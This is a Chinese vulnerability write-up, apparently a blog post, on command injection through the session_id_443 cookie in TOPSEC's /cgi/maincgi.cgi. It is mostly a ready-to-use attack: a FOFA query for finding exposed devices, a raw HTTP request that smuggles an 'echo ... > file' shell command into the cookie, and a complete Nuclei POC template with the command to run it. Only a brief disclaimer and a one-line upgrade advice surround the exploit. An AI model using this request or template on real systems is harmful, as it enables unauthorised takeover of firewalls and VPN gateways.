天融信TOPSEC Cookie 远程命令执行漏洞

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责!

一、漏洞名称

天融信TOPSEC Cookie 远程命令执行漏洞

二、漏洞影响

天融信TOPSEC

三、漏洞描述

天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。

四、FOFA搜索语句

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

五、漏洞复现

第一步,向靶场发送如下数据包,生成一个字符串写入文件

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: x.x.x.xCookie: session_id_443=1|echo 'nvgjngfszfzah1' > /www/htdocs/site/image/ecisas.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36

响应内容如下

HTTP/1.1 200 OKPragma: no-cacheSet-Cookie: session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/;;session_id_443=deleted; expires=Sat, 01 Jan 2011 00:00:00 GMT;path=/cgi/;Content-Length: 122Content-Type: text/html; charset=gb2312Date: Tue, 26 Dec 2023 23:53:28 GMTServer: TOPSECCache-Control: no-cache<script>alert('操作超时');if(window.opener){window.opener.top.location='/';self.close();}else{top.location='/';}</script>

第二步,访问回显文件

https://x.x.x.x/site/image/xxx.txt

复现成功

六、POC

POC内容: 

id: topsec-maincgi-cookie-rceinfo:name: 天融信TOPSEC Cookie 远程命令执行漏洞author: fgzseverity: criticaldescription: 天融信TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie参数存在RCE漏洞,会导致服务器失陷。metadata:max-request: 1fofa-query: title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"verified: truevariables:file_name: "{{to_lower(rand_text_alpha(6))}}"file_content: "{{to_lower(rand_text_alpha(15))}}"requests:- raw:- |+GET /cgi/maincgi.cgi?Url=aa HTTP/1.1Host: {{Hostname}}Cookie: session_id_443=1|echo '{{file_content}}' > /www/htdocs/site/image/{{file_name}}.txt;User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36- |GET /site/image/{{file_name}}.txt HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36matchers:- type: dsldsl:- "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

运行POC

命令:nuclei.exe -t 选择脚本 -u 扫描地址

1704185703_6593cf677bacc60d4c099.png!small?1704185705195

七、修复建议

升级到最新版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值